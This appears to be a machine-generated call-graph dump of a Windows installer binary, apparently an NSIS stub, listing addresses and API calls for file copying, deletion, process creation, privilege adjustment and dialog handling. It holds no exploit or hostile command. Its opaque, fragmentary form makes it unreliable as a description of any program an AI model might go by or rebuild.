3356->3346 3364 405d09 3356->3364 3357 405dd6 3414 405e11 lstrlenW CharPrevW 3357->3414 3360 405d90 FindNextFileW 3360->3364 3365 405da6 FindClose 3360->3365 3361 405c06 5 API calls 3363 405de8 3361->3363 3366 405e02 3363->3366 3367 405dec 3363->3367 3364->3360 3377 405d51 3364->3377 3398 40653c lstrcpynW 3364->3398 3365->3346 3369 4055a4 24 API calls 3366->3369 3367->3345 3370 4055a4 24 API calls 3367->3370 3369->3345 3372 405df9 3370->3372 3371 405c4e 60 API calls 3371->3377 3374 406302 36 API calls 3372->3374 3373 4055a4 24 API calls 3373->3360 3375 405e00 3374->3375 3375->3345 3376 4055a4 24 API calls 3376->3377 3377->3360 3377->3371 3377->3373 3377->3376 3399 405c06 3377->3399 3407 406302 MoveFileExW 3377->3407 3417 40653c lstrcpynW 3379->3417 3381 405f2a 3382 405ebc 4 API calls 3381->3382 3383 405f30 3382->3383 3384 405c6e 3383->3384 3385 4067eb 5 API calls 3383->3385 3384->3343 3384->3344 3391 405f40 3385->3391 3386 405f71 lstrlenW 3387 405f7c 3386->3387 3386->3391 3388 405e11 3 API calls 3387->3388 3390 405f81 GetFileAttributesW 3388->3390 3389 40689a 2 API calls 3389->3391 3390->3384 3391->3384 3391->3386 3391->3389 3392 405e5d 2 API calls 3391->3392 3392->3386 3393->3348 3395 405e6b 3394->3395 3396 405e71 CharPrevW 3395->3396 3397 405e7d 3395->3397 3396->3395 3396->3397 3397->3351 3398->3364 3418 40600d GetFileAttributesW 3399->3418 3401 405c33 3401->3377 3403 405c21 RemoveDirectoryW 3405 405c2f 3403->3405 3404 405c29 DeleteFileW 3404->3405 3405->3401 3406 405c3f SetFileAttributesW 3405->3406 3406->3401 3408 406316 3407->3408 3410 406323 3407->3410 3421 406188 3408->3421 3410->3377 3412 4068b0 FindClose 3411->3412 3413 405dd2 3411->3413 3412->3413 3413->3345 3413->3357 3415 405ddc 3414->3415 3416 405e2d lstrcatW 3414->3416 3415->3361 3416->3415 3417->3381 3419 405c12 3418->3419 3420 40601f SetFileAttributesW 3418->3420 3419->3401 3419->3403 3419->3404 3420->3419 3422 4061b8 3421->3422 3423 4061de GetShortPathNameW 3421->3423 3448 406032 GetFileAttributesW CreateFileW 3422->3448 3425 4061f3 3423->3425 3426 4062fd 3423->3426 3425->3426 3428 4061fb wsprintfA 3425->3428 3426->3410 3427 4061c2 CloseHandle GetShortPathNameW 3427->3426 3429 4061d6 3427->3429 3430 406579 17 API calls 3428->3430 3429->3423 3429->3426 3431 406223 3430->3431 3449 406032 GetFileAttributesW CreateFileW 3431->3449 3433 406230 3433->3426 3434 40623f GetFileSize GlobalAlloc 3433->3434 3435 406261 3434->3435 3436 4062f6 CloseHandle 3434->3436 3450 4060b5 ReadFile 3435->3450 3436->3426 3441 406280 lstrcpyA 3444 4062a2 3441->3444 3442 406294 3443 405f97 4 API calls 3442->3443 3443->3444 3445 4062d9 SetFilePointer 3444->3445 3457 4060e4 WriteFile 3445->3457 3448->3427 3449->3433 3451 4060d3 3450->3451 3451->3436 3452 405f97 lstrlenA 3451->3452 3453 405fd8 lstrlenA 3452->3453 3454 405fe0 3453->3454 3455 405fb1 lstrcmpiA 3453->3455 3454->3441 3454->3442 3455->3454 3456 405fcf CharNextA 3455->3456 3456->3453 3458 406102 GlobalFree 3457->3458 3458->3436 4271 402a42 4272 402d1c 17 API calls 4271->4272 4273 402a48 4272->4273 4274 402a88 4273->4274 4275 402a6f 4273->4275 4281 402925 4273->4281 4278 402aa2 4274->4278 4279 402a92 4274->4279 4276 402a74 4275->4276 4277 402a85 4275->4277 4285 40653c lstrcpynW 4276->4285 4286 406483 wsprintfW 4277->4286 4282 406579 17 API calls 4278->4282 4280 402d1c 17 API calls 4279->4280 4280->4281 4282->4281 4285->4281 4286->4281 4287 401c43 4288 402d1c 17 API calls 4287->4288 4289 401c4a 4288->4289 4290 402d1c 17 API calls 4289->4290 4291 401c57 4290->4291 4292 401c6c 4291->4292 4294 402d3e 17 API calls 4291->4294 4293 401c7c 4292->4293 4295 402d3e 17 API calls 4292->4295 4296 401cd3 4293->4296 4297 401c87 4293->4297 4294->4292 4295->4293 4299 402d3e 17 API calls 4296->4299 4298 402d1c 17 API calls 4297->4298 4300 401c8c 4298->4300 4301 401cd8 4299->4301 4303 402d1c 17 API calls 4300->4303 4302 402d3e 17 API calls 4301->4302 4304 401ce1 FindWindowExW 4302->4304 4305 401c98 4303->4305 4308 401d03 4304->4308 4306 401cc3 SendMessageW 4305->4306 4307 401ca5 SendMessageTimeoutW 4305->4307 4306->4308 4307->4308 4309 402b43 4310 406931 5 API calls 4309->4310 4311 402b4a 4310->4311 4312 402d3e 17 API calls 4311->4312 4313 402b53 4312->4313 4314 402b57 IIDFromString 4313->4314 4316 402b8e 4313->4316 4315 402b66 4314->4315 4314->4316 4315->4316 4319 40653c lstrcpynW 4315->4319 4318 402b83 CoTaskMemFree 4318->4316 4319->4318 4320 402947 4321 402d3e 17 API calls 4320->4321 4322 402955 4321->4322 4323 40296b 4322->4323 4324 402d3e 17 API calls 4322->4324 4325 40600d 2 API calls 4323->4325 4324->4323 4326 402971 4325->4326 4348 406032 GetFileAttributesW CreateFileW 4326->4348 4328 40297e 4329 402a21 4328->4329 4330 40298a GlobalAlloc 4328->4330 4333 402a29 DeleteFileW 4329->4333 4334 402a3c 4329->4334 4331 4029a3 4330->4331 4332 402a18 CloseHandle 4330->4332 4349 403590 SetFilePointer 4331->4349 4332->4329 4333->4334 4336 4029a9 4337 40357a ReadFile 4336->4337 4338 4029b2 GlobalAlloc 4337->4338 4339 4029c2 4338->4339 4340 4029f6 4338->4340 4341 403309 44 API calls 4339->4341 4342 4060e4 WriteFile 4340->4342 4347 4029cf 4341->4347 4343 402a02 GlobalFree 4342->4343 4344 403309 44 API calls 4343->4344 4345 402a15 4344->4345 4345->4332 4346 4029ed GlobalFree 4346->4340 4347->4346 4348->4328 4349->4336 4350 4045c8 lstrcpynW lstrlenW 4351 403bc9 4352 403bd4 4351->4352 4353 403bd8 4352->4353 4354 403bdb GlobalAlloc 4352->4354 4354->4353 3558 4014cb 3559 4055a4 24 API calls 3558->3559 3560 4014d2 3559->3560 4355 4016cc 4356 402d3e 17 API calls 4355->4356 4357 4016d2 GetFullPathNameW 4356->4357 4358 4016ec 4357->4358 4359 40170e 4357->4359 4358->4359 4362 40689a 2 API calls 4358->4362 4360 402bc2 4359->4360 4361 401723 GetShortPathNameW 4359->4361 4361->4360 4363 4016fe 4362->4363 4363->4359 4365 40653c lstrcpynW 4363->4365 4365->4359 4366 401e4e GetDC 4367 402d1c 17 API calls 4366->4367 4368 401e60 GetDeviceCaps MulDiv ReleaseDC 4367->4368 4369 402d1c 17 API calls 4368->4369 4370 401e91 4369->4370 4371 406579 17 API calls 4370->4371 4372 401ece CreateFontIndirectW 4371->4372 4373 402630 4372->4373 4381 402acf 4382 402d1c 17 API calls 4381->4382 4383 402ad5 4382->4383 4384 402b12 4383->4384 4385 402925 4383->4385 4387 402ae7 4383->4387 4384->4385 4386 406579 17 API calls 4384->4386 4386->4385 4387->4385 4389 406483 wsprintfW 4387->4389 4389->4385 3561 4020d0 3562 4020e2 3561->3562 3571 402194 3561->3571 3563 402d3e 17 API calls 3562->3563 3565 4020e9 3563->3565 3564 401423 24 API calls 3572 4022ee 3564->3572 3566 402d3e 17 API calls 3565->3566 3567 4020f2 3566->3567 3568 402108 LoadLibraryExW 3567->3568 3569 4020fa GetModuleHandleW 3567->3569 3570 402119 3568->3570 3568->3571 3569->3568 3569->3570 3581 4069a0 3570->3581 3571->3564 3575 402163 3577 4055a4 24 API calls 3575->3577 3576 40212a 3578 401423 24 API calls 3576->3578 3579 40213a 3576->3579 3577->3579 3578->3579 3579->3572 3580 402186 FreeLibrary 3579->3580 3580->3572 3586 40655e WideCharToMultiByte 3581->3586 3583 4069bd 3584 4069c4 GetProcAddress 3583->3584 3585 402124 3583->3585 3584->3585 3585->3575 3585->3576 3586->3583 4390 404651 4391 404669 4390->4391 4394 404783 4390->4394 4395 404492 18 API calls 4391->4395 4392 4047ed 4393 4047f7 GetDlgItem 4392->4393 4396 4048b7 4392->4396 4397 404811 4393->4397 4398 404878 4393->4398 4394->4392 4394->4396 4399 4047be GetDlgItem SendMessageW 4394->4399 4400 4046d0 4395->4400 4401 4044f9 8 API calls 4396->4401 4397->4398 4402 404837 SendMessageW LoadCursorW SetCursor 4397->4402 4398->4396 4403 40488a 4398->4403 4423 4044b4 KiUserCallbackDispatcher 4399->4423 4405 404492 18 API calls 4400->4405 4406 4048b2 4401->4406 4427 404900 4402->4427 4408 4048a0 4403->4408 4409 404890 SendMessageW 4403->4409 4411 4046dd CheckDlgButton 4405->4411 4408->4406 4413 4048a6 SendMessageW 4408->4413 4409->4408 4410 4047e8 4424 4048dc 4410->4424 4421 4044b4 KiUserCallbackDispatcher 4411->4421 4413->4406 4416 4046fb GetDlgItem 4422 4044c7 SendMessageW 4416->4422 4418 404711 SendMessageW 4419 404737 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4418->4419 4420 40472e GetSysColor 4418->4420 4419->4406 4420->4419 4421->4416 4422->4418 4423->4410 4425 4048ea 4424->4425 4426 4048ef SendMessageW 4424->4426 4425->4426 4426->4392 4430 405b68 ShellExecuteExW 4427->4430 4429 404866 LoadCursorW SetCursor 4429->4398 4430->4429 4431 4028d5 4432 4028dd 4431->4432 4433 4028e1 FindNextFileW 4432->4433 4434 4028f3 4432->4434 4433->4434 4435 40293a 4433->4435 4437 40653c lstrcpynW 4435->4437 4437->4434 4438 401956 4439 402d3e 17 API calls 4438->4439 4440 40195d lstrlenW 4439->4440 4441 402630 4440->4441 4442 4014d7 4443 402d1c 17 API calls 4442->4443 4444 4014dd Sleep 4443->4444 4446 402bc2 4444->4446 3604 4035d8 SetErrorMode GetVersion 3605 403617 3604->3605 3606 40361d 3604->3606 3607 406931 5 API calls 3605->3607 3608 4068c1 3 API calls 3606->3608 3607->3606 3609 403633 lstrlenA 3608->3609 3609->3606 3610 403643 3609->3610 3611 406931 5 API calls 3610->3611 3612 40364a 3611->3612 3613 406931 5 API calls 3612->3613 3614 403651 3613->3614 3615 406931 5 API calls 3614->3615 3616 40365d #17 OleInitialize SHGetFileInfoW 3615->3616 3694 40653c lstrcpynW 3616->3694 3619 4036a9 GetCommandLineW 3695 40653c lstrcpynW 3619->3695 3621 4036bb 3622 405e3e CharNextW 3621->3622 3623 4036e0 CharNextW 3622->3623 3624 40380a GetTempPathW 3623->3624 3632 4036f9 3623->3632 3696 4035a7 3624->3696 3626 403822 3627 403826 GetWindowsDirectoryW lstrcatW 3626->3627 3628 40387c DeleteFileW 3626->3628 3629 4035a7 12 API calls 3627->3629 3706 403068 GetTickCount GetModuleFileNameW 3628->3706 3633 403842 3629->3633 3630 405e3e CharNextW 3630->3632 3632->3630 3637 4037f5 3632->3637 3639 4037f3 3632->3639 3633->3628 3635 403846 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3633->3635 3634 403890 3641 405e3e CharNextW 3634->3641 3678 403933 3634->3678 3689 403943 3634->3689 3638 4035a7 12 API calls 3635->3638 3792 40653c lstrcpynW 3637->3792 3644 403874 3638->3644 3639->3624 3650 4038af 3641->3650 3644->3628 3644->3689 3645 403a7d 3648 403b01 ExitProcess 3645->3648 3649 403a85 GetCurrentProcess OpenProcessToken 3645->3649 3646 40395d 3804 405ba2 3646->3804 3655 403ad1 3649->3655 3656 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 3649->3656 3652 403973 3650->3652 3653 40390d 3650->3653 3658 405b0d 5 API calls 3652->3658 3657 405f19 18 API calls 3653->3657 3659 406931 5 API calls 3655->3659 3656->3655 3660 403919 3657->3660 3661 403978 lstrcatW 3658->3661 3662 403ad8 3659->3662 3660->3689 3793 40653c lstrcpynW 3660->3793 3664 403994 lstrcatW lstrcmpiW 3661->3664 3665 403989 lstrcatW 3661->3665 3663 403aed ExitWindowsEx 3662->3663 3666 403afa 3662->3666 3663->3648 3663->3666 3668 4039b0 3664->3668 3664->3689 3665->3664 3813 40140b 3666->3813 3671 4039b5 3668->3671 3672 4039bc 3668->3672 3670 403928 3794 40653c lstrcpynW 3670->3794 3673 405a73 4 API calls 3671->3673 3674 405af0 2 API calls 3672->3674 3676 4039ba 3673->3676 3677 4039c1 SetCurrentDirectoryW 3674->3677 3676->3677 3679 4039d1 3677->3679 3680 4039dc 3677->3680 3736 403c0b 3678->3736 3808 40653c lstrcpynW 3679->3808 3809 40653c lstrcpynW 3680->3809 3683 406579 17 API calls 3684 403a1b DeleteFileW 3683->3684 3685 403a28 CopyFileW 3684->3685 3691 4039ea 3684->3691 3685->3691 3686 403a71 3687 406302 36 API calls 3686->3687 3687->3689 3688 406302 36 API calls 3688->3691 3795 403b19 3689->3795 3690 406579 17 API calls 3690->3691 3691->3683 3691->3686 3691->3688 3691->3690 3693 403a5c CloseHandle 3691->3693 3810 405b25 CreateProcessW 3691->3810 3693->3691 3694->3619 3695->3621 3697 4067eb 5 API calls 3696->3697 3699 4035b3 3697->3699 3698 4035bd 3698->3626 3699->3698 3700 405e11 3 API calls 3699->3700 3701 4035c5 3700->3701 3702 405af0 2 API calls 3701->3702 3703 4035cb 3702->3703 3816 406061 3703->3816 3820 406032 GetFileAttributesW CreateFileW 3706->3820 3708 4030ab 3735 4030b8 3708->3735 3821 40653c lstrcpynW 3708->3821 3710 4030ce 3711 405e5d 2 API calls 3710->3711 3712 4030d4 3711->3712 3822 40653c lstrcpynW 3712->3822 3714 4030df GetFileSize 3715 4030f6 3714->3715 3730 4031d9 3714->3730 3718 40357a ReadFile 3715->3718 3722 403276 3715->3722 3729 402fc6 32 API calls 3715->3729 3715->3730 3715->3735 3716 402fc6 32 API calls 3717 4031e2 3716->3717 3719 40321e GlobalAlloc 3717->3719 3717->3735 3824 403590 SetFilePointer 3717->3824 3718->3715 3720 403235 3719->3720 3725 406061 2 API calls 3720->3725 3723 402fc6 32 API calls 3722->3723 3723->3735 3724 4031ff 3726 40357a ReadFile 3724->3726 3727 403246 CreateFileW 3725->3727 3728 40320a 3726->3728 3731 403280 3727->3731 3727->3735 3728->3719 3728->3735 3729->3715 3730->3716 3823 403590 SetFilePointer 3731->3823 3733 40328e 3734 403309 44 API calls 3733->3734 3734->3735 3735->3634 3737 406931 5 API calls 3736->3737 3738 403c1f 3737->3738 3739 403c25 3738->3739 3740 403c37 3738->3740 3840 406483 wsprintfW 3739->3840 3741 40640a 3 API calls 3740->3741 3742 403c67 3741->3742 3744 403c86 lstrcatW 3742->3744 3746 40640a 3 API calls 3742->3746 3745 403c35 3744->3745 3825 403ee1 3745->3825 3746->3744 3749 405f19 18 API calls 3750 403cb8 3749->3750 3751 403d4c 3750->3751 3753 40640a 3 API calls 3750->3753 3752 405f19 18 API calls 3751->3752 3754 403d52 3752->3754 3755 403cea 3753->3755 3756 403d62 LoadImageW 3754->3756 3757 406579 17 API calls 3754->3757 3755->3751 3761 403d0b lstrlenW 3755->3761 3765 405e3e CharNextW 3755->3765 3758 403e08 3756->3758 3759 403d89 RegisterClassW 3756->3759 3757->3756 3760 40140b 2 API calls 3758->3760 3762 403e12 3759->3762 3763 403dbf SystemParametersInfoW CreateWindowExW 3759->3763 3764 403e0e 3760->3764 3766 403d19 lstrcmpiW 3761->3766 3767 403d3f 3761->3767 3762->3689 3763->3758 3764->3762 3772 403ee1 18 API calls 3764->3772 3769 403d08 3765->3769 3766->3767 3770 403d29 GetFileAttributesW 3766->3770 3768 405e11 3 API calls 3767->3768 3773 403d45 3768->3773 3769->3761 3771 403d35 3770->3771 3771->3767 3774 405e5d 2 API calls 3771->3774 3775 403e1f 3772->3775 3841 40653c lstrcpynW 3773->3841 3774->3767 3777 403e2b ShowWindow 3775->3777 3778 403eae 3775->3778 3780 4068c1 3 API calls 3777->3780 3833 405677 OleInitialize 3778->3833 3785 403e43 3780->3785 3781 403eb4 3782 403ed0 3781->3782 3783 403eb8 3781->3783 3786 40140b 2 API calls 3782->3786 3783->3762 3790 40140b 2 API calls 3783->3790 3784 403e51 GetClassInfoW 3788 403e65 GetClassInfoW RegisterClassW 3784->3788 3789 403e7b DialogBoxParamW 3784->3789 3785->3784 3787 4068c1 3 API calls 3785->3787 3786->3762 3787->3784 3788->3789 3791 40140b 2 API calls 3789->3791 3790->3762 3791->3762 3792->3639 3793->3670 3794->3678 3796 403b34 3795->3796 3797 403b2a CloseHandle 3795->3797 3798 403b48 3796->3798 3799 403b3e CloseHandle 3796->3799 3797->3796 3853 403b76 3798->3853 3799->3798 3802 405c4e 67 API calls 3803 40394c OleUninitialize 3802->3803 3803->3645 3803->3646 3805 405bb7 3804->3805 3806 40396b ExitProcess 3805->3806 3807 405bcb MessageBoxIndirectW 3805->3807 3807->3806 3808->3680 3809->3691 3811 405b64 3810->3811 3812 405b58 CloseHandle 3810->3812 3811->3691 3812->3811 3814 401389 2 API calls 3813->3814 3815 401420 3814->3815 3815->3648 3817 40606e GetTickCount GetTempFileNameW 3816->3817 3818 4060a4 3817->3818 3819 4035d6 3817->3819 3818->3817 3818->3819 3819->3626 3820->3708 3821->3710 3822->3714 3823->3733 3824->3724 3826 403ef5 3825->3826 3842 406483 wsprintfW 3826->3842 3828 403f66 3843 403f9a 3828->3843 3830 403c96 3830->3749 3831 403f6b 3831->3830 3832 406579 17 API calls 3831->3832 3832->3831 3846 4044de 3833->3846 3835 40569a 3839 4056c1 3835->3839 3849 401389 3835->3849 3836 4044de SendMessageW 3837 4056d3 OleUninitialize 3836->3837 3837->3781 3839->3836 3840->3745 3841->3751 3842->3828 3844 406579 17 API calls 3843->3844 3845 403fa8 SetWindowTextW 3844->3845 3845->3831 3847 4044f6 3846->3847 3848 4044e7 SendMessageW 3846->3848 3847->3835 3848->3847 3851 401390 3849->3851 3850 4013fe 3850->3835 3851->3850 3852 4013cb MulDiv SendMessageW 3851->3852 3852->3851 3854 403b84 3853->3854 3855 403b4d 3854->3855 3856 403b89 FreeLibrary GlobalFree 3854->3856 3855->3802 3856->3855 3856->3856 4447 404cd9 4448 404d05 4447->4448 4449 404ce9 4447->4449 4451 404d38 4448->4451 4452 404d0b SHGetPathFromIDListW 4448->4452 4458 405b86 GetDlgItemTextW 4449->4458 4454 404d22 SendMessageW 4452->4454 4455 404d1b 4452->4455 4453 404cf6 SendMessageW 4453->4448 4454->4451 4456 40140b 2 API calls 4455->4456 4456->4454 4458->4453 4459 406c5b 4460 406adf 4459->4460 4461 40744a 4460->4461 4462 406b60 GlobalFree 4460->4462 4463 406b69 GlobalAlloc 4460->4463 4464 406be0 GlobalAlloc 4460->4464 4465 406bd7 GlobalFree 4460->4465 4462->4463 4463->4460 4463->4461 4464->4460 4464->4461 4465->4464 3888 40175c 3889 402d3e 17 API calls 3888->3889 3890 401763 3889->3890 3891 406061 2 API calls 3890->3891 3892 40176a 3891->3892 3893 406061 2 API calls 3892->3893 3893->3892 4466 401d5d 4467 402d1c 17 API calls 4466->4467 4468 401d6e SetWindowLongW 4467->4468 4469 402bc2 4468->4469 4470 401ede 4471 402d1c 17 API calls 4470->4471 4472 401ee4 4471->4472 4473 402d1c 17 API calls 4472->4473 4474 401ef0 4473->4474 4475 401f07 EnableWindow 4474->4475 4476 401efc ShowWindow 4474->4476 4477 402bc2 4475->4477 4476->4477 3906 4056e3 3907 405704 GetDlgItem GetDlgItem GetDlgItem 3906->3907 3908 40588d 3906->3908 3951 4044c7 SendMessageW 3907->3951 3909 405896 GetDlgItem CreateThread CloseHandle 3908->3909 3910 4058be 3908->3910 3909->3910 3974 405677 5 API calls 3909->3974 3912 4058e9 3910->3912 3914 4058d5 ShowWindow ShowWindow 3910->3914 3915 40590e 3910->3915 3916 405949 3912->3916 3919 405923 ShowWindow 3912->3919 3920 4058fd 3912->3920 3913 405774 3917 40577b GetClientRect GetSystemMetrics SendMessageW SendMessageW 3913->3917 3956 4044c7 SendMessageW 3914->3956 3960 4044f9 3915->3960 3916->3915 3924 405957 SendMessageW 3916->3924 3922 4057e9 3917->3922 3923 4057cd SendMessageW SendMessageW 3917->3923 3926 405943 3919->3926 3927 405935 3919->3927 3957 40446b 3920->3957 3929 4057fc 3922->3929 3930 4057ee SendMessageW 3922->3930 3923->3922 3931 405970 CreatePopupMenu 3924->3931 3932 40591c 3924->3932 3928 40446b SendMessageW 3926->3928 3933 4055a4 24 API calls 3927->3933 3928->3916 3952 404492 3929->3952 3930->3929 3934 406579 17 API calls 3931->3934 3933->3926 3936 405980 AppendMenuW 3934->3936 3938 4059b0 TrackPopupMenu 3936->3938 3939 40599d GetWindowRect 3936->3939 3937 40580c 3940 405815 ShowWindow 3937->3940 3941 405849 GetDlgItem SendMessageW 3937->3941 3938->3932 3942 4059cb 3938->3942 3939->3938 3943 405838 3940->3943 3944 40582b ShowWindow 3940->3944 3941->3932 3945 405870 SendMessageW SendMessageW 3941->3945 3946 4059e7 SendMessageW 3942->3946 3955 4044c7 SendMessageW 3943->3955 3944->3943 3945->3932 3946->3946 3947 405a04 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3946->3947 3949 405a29 SendMessageW 3947->3949 3949->3949 3950 405a52 GlobalUnlock SetClipboardData CloseClipboard 3949->3950 3950->3932 3951->3913 3953 406579 17 API calls 3952->3953 3954 40449d SetDlgItemTextW 3953->3954 3954->3937 3955->3941 3956->3912 3958 404472 3957->3958 3959 404478 SendMessageW 3957->3959 3958->3959 3959->3915 3961 404511 GetWindowLongW 3960->3961 3962 4045bc 3960->3962 3961->3962 3963 404526 3961->3963 3962->3932 3963->3962 3964 404553 GetSysColor 3963->3964 3965 404556 3963->3965 3964->3965 3966 404566 SetBkMode 3965->3966 3967 40455c SetTextColor 3965->3967 3968 404584 3966->3968 3969 40457e GetSysColor 3966->3969 3967->3966 3970 404595 3968->3970 3971 40458b SetBkColor 3968->3971 3969->3968 3970->3962 3972 4045a8 DeleteObject 3970->3972 3973 4045af CreateBrushIndirect 3970->3973 3971->3970 3972->3973 3973->3962 4478 401563 4479 402b08 4478->4479 4482 406483 wsprintfW 4479->4482 4481 402b0d 4482->4481 4490 4026e4 4491 402d1c 17 API calls 4490->4491 4497 4026f3 4491->4497 4492 40273d ReadFile 4492->4497 4502 402830 4492->4502 4493 4060b5 ReadFile 4493->4497 4494 402832 4512 406483 wsprintfW 4494->4512 4495 40277d MultiByteToWideChar 4495->4497 4497->4492 4497->4493 4497->4494 4497->4495 4499 4027a3 SetFilePointer MultiByteToWideChar 4497->4499 4500 402843 4497->4500 4497->4502 4503 406113 SetFilePointer 4497->4503 4499->4497 4501 402864 SetFilePointer 4500->4501 4500->4502 4501->4502 4504 406147 4503->4504 4505 40612f 4503->4505 4504->4497 4506 4060b5 ReadFile 4505->4506 4507 40613b 4506->4507 4507->4504 4508 406150 SetFilePointer 4507->4508 4509 406178 SetFilePointer 4507->4509 4508->4509 4510 40615b 4508->4510 4509->4504 4511 4060e4 WriteFile 4510->4511 4511->4504 4512->4502 4000 405b68 ShellExecuteExW 4513 401968 4514 402d1c 17 API calls 4513->4514 4515 40196f 4514->4515 4516 402d1c 17 API calls 4515->4516 4517 40197c 4516->4517 4518 402d3e 17 API calls 4517->4518 4519 401993 lstrlenW 4518->4519 4520 4019a4 4519->4520 4521 4019e5 4520->4521 4525 40653c lstrcpynW 4520->4525 4523 4019d5 4523->4521 4524 4019da lstrlenW 4523->4524 4524->4521 4525->4523 4526 40166a 4527 402d3e 17 API calls 4526->4527 4528 401670 4527->4528 4529 40689a 2 API calls 4528->4529 4530 401676 4529->4530 4011 4023ec 4012 402d3e 17 API calls 4011->4012 4013 4023fb 4012->4013 4014 402d3e 17 API calls 4013->4014 4015 402404 4014->4015 4016 402d3e 17 API calls 4015->4016 4017 40240e GetPrivateProfileStringW 4016->4017 4049 40176f 4050 402d3e 17 API calls 4049->4050 4051 401776 4050->4051 4052 401796 4051->4052 4053 40179e 4051->4053 4089 40653c lstrcpynW 4052->4089 4090 40653c lstrcpynW 4053->4090 4056 40179c 4060 4067eb 5 API calls 4056->4060 4057 4017a9 4058 405e11 3 API calls 4057->4058 4059 4017af lstrcatW 4058->4059 4059->4056 4065 4017bb 4060->4065 4061 40689a 2 API calls 4061->4065 4062 40600d 2 API calls 4062->4065 4064 4017cd CompareFileTime 4064->4065 4065->4061 4065->4062 4065->4064 4066 40188d 4065->4066 4069 40653c lstrcpynW 4065->4069 4076 406579 17 API calls 4065->4076 4083 405ba2 MessageBoxIndirectW 4065->4083 4086 401864 4065->4086 4088 406032 GetFileAttributesW CreateFileW 4065->4088 4067 4055a4 24 API calls 4066->4067 4070 401897 4067->4070 4068 4055a4 24 API calls 4074 401879 4068->4074 4069->4065 4071 403309 44 API calls 4070->4071 4072 4018aa 4071->4072 4073 4018be SetFileTime 4072->4073 4075 4018d0 CloseHandle 4072->4075 4073->4075 4077 4018e1 4075->4077 4078 402395 4075->4078 4076->4065 4079 4018e6 4077->4079 4080 4018f9 4077->4080 4078->4074 4081 406579 17 API calls 4079->4081 4082 406579 17 API calls 4080->4082 4084 4018ee lstrcatW 4081->4084 4085 401901 4082->4085 4083->4065 4084->4085 4087 405ba2 MessageBoxIndirectW 4085->4087 4086->4068 4086->4074 4087->4078 4088->4065 4089->4056 4090->4057 4531 401a72 4532 402d1c 17 API calls 4531->4532 4533 401a7b 4532->4533 4534 402d1c 17 API calls 4533->4534 4535 401a20 4534->4535 4091 401573 4092 401583 ShowWindow 4091->4092 4093 40158c 4091->4093 4092->4093 4094 402bc2 4093->4094 4095 40159a ShowWindow 4093->4095 4095->4094 4536 4014f5 SetForegroundWindow 4537 402bc2 4536->4537 4538 401ff6 4539 402d3e 17 API calls 4538->4539 4540 401ffd 4539->4540 4541 40689a 2 API calls 4540->4541 4542 402003 4541->4542 4544 402014 4542->4544 4545 406483 wsprintfW 4542->4545 4545->4544 4100 4022f7 4101 402d3e 17 API calls 4100->4101 4102 4022fd 4101->4102 4103 402d3e 17 API calls 4102->4103 4104 402306 4103->4104 4105 402d3e 17 API calls 4104->4105 4106 40230f 4105->4106 4107 40689a 2 API calls 4106->4107 4108 402318 4107->4108 4109 402329 lstrlenW lstrlenW 4108->4109 4110 40231c 4108->4110 4112 4055a4 24 API calls 4109->4112 4111 4055a4 24 API calls 4110->4111 4114 402324 4110->4114 4111->4114 4113 402367 SHFileOperationW 4112->4113 4113->4110 4113->4114 4546 401b77 4547 402d3e 17 API calls 4546->4547 4548 401b7e 4547->4548 4549 402d1c 17 API calls 4548->4549 4550 401b87 wsprintfW 4549->4550 4551 402bc2 4550->4551 4189 40167b 4190 402d3e 17 API calls 4189->4190 4191 401682 4190->4191 4192 402d3e 17 API calls 4191->4192 4193 40168b 4192->4193 4194 402d3e 17 API calls 4193->4194 4195 401694 MoveFileW 4194->4195 4196 4016a0 4195->4196 4197 4016a7 4195->4197 4198 401423 24 API calls 4196->4198 4199 40689a 2 API calls 4197->4199 4201 4022ee 4197->4201 4198->4201 4200 4016b6 4199->4200 4200->4201 4202 406302 36 API calls 4200->4202 4202->4196 4559 40237b 4560 402382 4559->4560 4564 402395 4559->4564 4561 406579 17 API calls 4560->4561 4562 40238f 4561->4562 4563 405ba2 MessageBoxIndirectW 4562->4563 4563->4564 4203 404eff GetDlgItem GetDlgItem 4204 404f53 7 API calls 4203->4204 4218 40517d 4203->4218 4205 404ff0 SendMessageW 4204->4205 4206 404ffd DeleteObject 4204->4206 4205->4206 4207 405008 4206->4207 4209 405017 4207->4209 4210 40503f 4207->4210 4208 405265 4214 40530e 4208->4214 4221 405170 4208->4221 4226 4052bb SendMessageW 4208->4226 4211 406579 17 API calls 4209->4211 4213 404492 18 API calls 4210->4213 4215 405021 SendMessageW SendMessageW 4211->4215 4212 405246 4212->4208 4222 405257 SendMessageW 4212->4222 4220 405053 4213->4220 4216 405323 4214->4216 4217 405317 SendMessageW 4214->4217 4215->4207 4228 405335 ImageList_Destroy 4216->4228 4229 40533c 4216->4229 4235 40534c 4216->4235 4217->4216 4218->4208 4218->4212 4219 4051de 4218->4219 4224 404e4d 5 API calls 4219->4224 4225 404492 18 API calls 4220->4225 4223 4044f9 8 API calls 4221->4223 4222->4208 4227 405511 4223->4227 4240 4051ef 4224->4240 4241 405064 4225->4241 4226->4221 4231 4052d0 SendMessageW 4226->4231 4228->4229 4233 405345 GlobalFree 4229->4233 4229->4235 4230 4054c5 4230->4221 4236 4054d7 ShowWindow GetDlgItem ShowWindow 4230->4236 4232 4052e3 4231->4232 4243 4052f4 SendMessageW 4232->4243 4233->4235 4234 40513f GetWindowLongW SetWindowLongW 4237 405158 4234->4237 4235->4230 4250 404ecd 4 API calls 4235->4250 4251 405387 4235->4251 4236->4221 4238 405175 4237->4238 4239 40515d ShowWindow 4237->4239 4259 4044c7 SendMessageW 4238->4259 4258 4044c7 SendMessageW 4239->4258 4240->4212 4241->4234 4242 4050b7 SendMessageW 4241->4242 4244 40513a 4241->4244 4248 4050f5 SendMessageW 4241->4248 4249 405109 SendMessageW 4241->4249 4242->4241 4243->4214 4244->4234 4244->4237 4245 4053cb 4252 405491 4245->4252 4257 40543f SendMessageW SendMessageW 4245->4257 4248->4241 4249->4241 4250->4251 4251->4245 4254 4053b5 SendMessageW 4251->4254 4253 40549b InvalidateRect 4252->4253 4255 4054a7 4252->4255 4253->4255 4254->4245 4255->4230 4260 404e08 4255->4260 4257->4245 4258->4221 4259->4218 4263 404d3f 4260->4263 4262 404e1d 4262->4230 4264 404d58 4263->4264 4265 406579 17 API calls 4264->4265 4266 404dbc 4265->4266 4267 406579 17 API calls 4266->4267 4268 404dc7 4267->4268 4269 406579 17 API calls 4268->4269 4270 404ddd lstrlenW wsprintfW 